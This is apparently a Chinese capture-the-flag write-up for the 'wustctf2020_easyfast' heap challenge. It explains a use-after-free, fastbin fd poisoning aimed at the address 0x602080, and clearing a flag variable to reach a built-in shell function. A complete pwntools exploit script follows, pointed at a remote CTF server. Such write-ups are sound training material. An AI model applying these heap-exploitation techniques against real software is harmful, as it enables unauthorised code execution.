wustctf2020_easyfast
查看保护
漏洞点的话出在了这里,一个uaf。
add可以四次,edit也可以改8个数据
这里还有一个比较关键,就是有一个getshell的函数,但602090是1,需要将它改为0
思路就是fastbin double free改fd到602080,原因是因为2.23下的libc会检测size是否合格。最后申请到602090,改里面的数据为0即可getshell。具体fastbin attack看z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 25008)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'choice>'
def add(size):
r.sendlineafter(menu, '1')
r.sendlineafter('size>', str(size))
def delete(index):
r.sendlineafter(menu, '2')
r.sendlineafter('index>', str(index))
def edit(index, content):
r.sendlineafter(menu, '3')
r.sendlineafter('index>', str(index))
r.send(content)
add(0x40)#0
delete(0)
edit(0, p64(0x602080))
add(0x40)
add(0x40)
edit(2, p64(0))
r.sendlineafter(menu, '4')
r.interactive()